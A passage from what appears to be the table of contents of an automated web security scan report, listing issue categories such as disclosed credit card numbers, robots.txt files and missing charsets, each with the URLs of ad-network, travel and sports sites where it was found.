23.63. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.64. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.65. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

23.66. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.67. http://static.ak.connect.facebook.com/connect.php/en_US

23.68. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.69. http://static.ak.connect.facebook.com/images/connect_sprite.png

23.70. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

23.71. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.72. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.73. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.74. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.76. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

23.77. http://www.facebook.com/dialog/oauth

23.78. http://www.facebook.com/extern/login_status.php

23.79. http://www.facebook.com/extern/login_status.php

23.80. http://www.facebook.com/extern/login_status.php

23.81. http://www.facebook.com/extern/login_status.php

23.82. http://www.facebook.com/extern/login_status.php

23.83. http://www.facebook.com/extern/login_status.php

23.84. http://www.facebook.com/extern/login_status.php

23.85. http://www.facebook.com/plugins/like.php

23.86. http://www.facebook.com/plugins/like.php

23.87. http://www.facebook.com/plugins/like.php

23.88. http://www.facebook.com/plugins/like.php

23.89. http://www.facebook.com/plugins/like.php

23.90. http://www.facebook.com/plugins/like.php

23.91. http://www.facebook.com/plugins/like.php

23.92. http://www.facebook.com/plugins/like.php

23.93. http://www.facebook.com/plugins/like.php

23.94. http://www.facebook.com/plugins/like.php

23.95. http://www.facebook.com/plugins/like.php

23.96. http://www.facebook.com/plugins/like.php

23.97. http://www.facebook.com/plugins/like.php

23.98. http://www.facebook.com/plugins/like.php

23.99. http://www.facebook.com/plugins/like.php

23.100. http://www.facebook.com/plugins/like.php

23.101. http://www.facebook.com/plugins/like.php

23.102. http://www.facebook.com/plugins/like.php

23.103. http://www.facebook.com/plugins/like.php

23.104. http://www.facebook.com/plugins/like.php

23.105. http://www.facebook.com/plugins/like.php

23.106. http://www.facebook.com/plugins/like.php

23.107. http://www.facebook.com/plugins/like.php

23.108. http://www.facebook.com/plugins/like.php

23.109. http://www.facebook.com/plugins/like.php

23.110. http://www.facebook.com/plugins/like.php

23.111. http://www.facebook.com/plugins/like.php

23.112. http://www.facebook.com/plugins/like.php

23.113. http://www.facebook.com/plugins/like.php

23.114. http://www.facebook.com/plugins/like.php

23.115. http://www.facebook.com/plugins/like.php

23.116. http://www.facebook.com/plugins/like.php

23.117. http://www.facebook.com/plugins/like.php

23.118. http://www.facebook.com/plugins/like.php

23.119. http://www.facebook.com/plugins/like.php

23.120. http://www.facebook.com/plugins/like.php

23.121. http://www.facebook.com/plugins/like.php

23.122. http://www.facebook.com/plugins/like.php

23.123. http://www.facebook.com/plugins/likebox.php

23.124. http://www.facebook.com/plugins/likebox.php

23.125. http://www.facebook.com/plugins/likebox.php

23.126. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.127. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.128. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.129. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.130. http://xml.premierleague.com/crossDomain.html

24. Credit card numbers disclosed

24.1. http://www.cheaptickets.com/shop/hotelsearch

24.2. http://www.expedia.com/Hotel-Search

24.3. http://www.orbitz.com/shop/hotelsearch

25. Robots.txt file

25.1. http://a.analytics.yahoo.com/fpc.pl

25.2. http://ad-dc2.adtech.de/adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

25.3. http://ad.doubleclick.net/adj/cm.guardian/

25.4. http://ad.technoratimedia.com/st

25.5. http://ad.turn.com/server/ads.js

25.6. http://ad.yieldmanager.com/st

25.7. http://ad4.liverail.com/crossdomain.xml

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

25.10. http://b.scorecardresearch.com/b

25.11. http://bcp.crwdcntrl.net/4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

25.12. http://beacon.securestudies.com/scripts/beacon.dll

25.13. http://c.betrad.com/a/n/44/546.js

25.14. http://cas.criteo.com/delivery/ajs.php

25.15. http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

25.16. http://cdn.turn.com/server/ddc.htm

25.17. http://d.tradex.openx.com/afr.php

25.18. http://ehg-twi.hitbox.com/HG

25.19. http://googleads.g.doubleclick.net/pagead/ads

25.20. http://hits.guardian.co.uk/b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

25.21. http://idpix.media6degrees.com/orbserv/hbpix

25.22. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap

25.23. http://m.xp1.ru4.com/activity

25.24. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

25.25. http://openx.px.invitemedia.com/openx_sync

25.26. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

25.27. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

25.28. http://premiumtv.122.2o7.net/b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

25.29. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

25.30. http://resource.guim.co.uk/books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

25.31. http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.swf

25.32. http://safebrowsing.clients.google.com/safebrowsing/gethash

25.33. https://secure.mlb.com/resetPassword.do

25.34. http://servedby.flashtalking.com/imp/1/16628

25.35. http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

25.36. http://sync.mathtag.com/sync/img

25.37. http://tag.admeld.com/id

25.38. http://www.goal.com/en/teams/england/97/man-utd-news

25.39. http://www.google-analytics.com/__utm.gif

25.40. http://www.guardian.co.uk/football/manchester-united

25.41. http://www.luminate.com/widget/v3/53d1ac1014/config/

25.42. http://www.manutd.com/

25.43. http://www.premierleague.com/page/Home/0,,12306,00.html

26. Cacheable HTTPS response

26.1. https://axptravel.americanexpress.com/consumertravel/customlogin.do

26.2. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

26.3. https://secure.mlb.com/resetPassword.do

26.4. https://www.expedia.com/static/default/default/stubs/adserver.json

26.5. https://www.hotelplanner.com/

26.6. https://www.hotelplanner.com/Accept/Reserve.cfm

26.7. https://www.hotelplanner.com/LastActive.cfm

26.8. https://www.hotelplanner.com/TT.cfm

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.2. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

27.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

27.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

27.5. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

27.6. http://ad.doubleclick.net/adi/gna.en/level2

27.7. http://ad.yieldmanager.com/iframe3

27.8. http://ads.pointroll.com/PortalServe/

27.9. http://amch.questionmarket.com/adscgen/st.php

27.10. http://aud.pubmatic.com/AdServer/Artemis

27.11. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

27.12. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

27.13. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

27.14. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

27.15. http://content1.admonkey.dapper.net/clients/expedia/SearchResults_US.html

27.16. http://d.xp1.ru4.com/meta

27.17. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results

27.18. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details

27.19. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results

27.20. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results

27.21. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results

27.22. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details

27.23. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

27.24. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

27.25. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615

27.26. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130

27.27. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

27.28. http://fls.doubleclick.net/activityi

27.29. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.30. http://hublotnation.com/

27.31. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

27.32. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40®ION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

27.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.35. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.36. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.37. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.38. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.39. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

27.40. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.41. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

27.42. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

27.43. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

27.44. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

27.45. http://pixel.invitemedia.com/data_sync

27.46. http://showadsak.pubmatic.com/AdServer/AdServerServlet

27.47. http://tags.bluekai.com/site/2565

27.48. http://tags.bluekai.com/site/2625

27.49. http://uxm.thousandeyes.com/rest/json

27.50. http://www.aon.com/manchesterunited/

27.51. http://www.aon.com/unitedin2010/

27.52. http://www.aon.com/unitedin2010/index.jsp

27.53. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

27.54. http://www.cheaptickets.com/cacheable/ad.html

27.55. http://www.cheaptickets.com/cacheable/ad_empty.html

27.56. http://www.cheaptickets.com/cacheable/cedexis/radar.html

27.57. http://www.cheaptickets.com/cacheable/empty.html

27.58. http://www.cmegroup.com/advance/

27.59. http://www.cmegroup.com/advance/about.html

27.60. http://www.cmegroup.com/advance/build-1.html

27.61. http://www.cmegroup.com/advance/build-2.html

27.62. http://www.cmegroup.com/advance/build.html

27.63. http://www.cmegroup.com/advance/elements.html

27.64. http://www.cmegroup.com/advance/finance-1.html

27.65. http://www.cmegroup.com/advance/finance-2.html

27.66. http://www.cmegroup.com/advance/finance.html

27.67. http://www.cmegroup.com/advance/intro.html

27.68. http://www.cmegroup.com/advance/plant-1.html

27.69. http://www.cmegroup.com/advance/plant-2.html

27.70. http://www.cmegroup.com/advance/plant.html

27.71. http://www.cmegroup.com/advance/trade-1.html

27.72. http://www.cmegroup.com/advance/trade-2.html

27.73. http://www.cmegroup.com/advance/trade.html

27.74. http://www.cmegroup.com/advance/world-advances.html

27.75. http://www.orbitz.com/App/ViewDHTMLCalendar

27.76. http://www.orbitz.com/cacheable/ad.html

27.77. http://www.orbitz.com/cacheable/ad_empty.html

27.78. http://www.orbitz.com/cacheable/cedexis/radar.html

27.79. http://www.orbitz.com/cacheable/empty.html

27.80. http://www.orbitz.com/shared/adserverProxy.jsp

27.81. http://www.trip.com/box_ad_refresh.html

27.82. http://www9.effectivemeasure.net/favicon.ico

27.83. http://xml.premierleague.com/crossDomain.html

28. Content type incorrectly stated

28.1. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1310831078

28.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1982940443

28.3. http://a1.interclick.com/getInPageJS.aspx

28.4. http://a1.interclick.com/getInPageJSProcess.aspx

28.5. http://a2.twimg.com/profile_images/1470671793/ProfilePhoto_normal.png

28.6. http://ad.reklamport.com/rpgetad.ashx

28.7. http://ads.pointroll.com/PortalServe/

28.8. http://adserver.teracent.net/tase/ad

28.9. http://amch.questionmarket.com/adscgen/st.php

28.10. http://api.connect.facebook.com/restserver.php

28.11. http://api.facebook.com/method/fql.query

28.12. http://ar.voicefive.com/b/rc.pli

28.13. http://as00.estara.com/fs/ruleaction.php

28.14. http://ats.tumri.net/ats/ats

28.15. http://aud.pubmatic.com/AdServer/Artemis

28.16. http://calls.esitemarketing.com/euinc/getnumdata.js

28.17. http://calls.esitemarketing.com/euinc/number-changer.js

28.18. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

28.19. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

28.20. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

28.21. http://event.adxpose.com/event.flow

28.22. http://expedia-www.baynote.net/baynote/tags3/common

28.23. http://hublotnation.com/wp/wp-admin/admin-ajax.php

28.24. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

28.25. http://i1.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.26. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.27. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_48x48.jpg

28.28. http://i2.goal.com/files/images/stats/goal/team-logos/8/98_20x20.jpg

28.29. http://img.agoda.net/images/default/bg_tthome.gif

28.30. http://img.agoda.net/images/default/google_search.gif

28.31. http://img.agoda.net/images/default/mouse_overbg.gif

28.32. http://ipinvite.iperceptions.com/Invitations/Javascripts/customInvites.aspx

28.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

28.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

28.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.36. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

28.37. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

28.38. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

28.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591

28.40. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f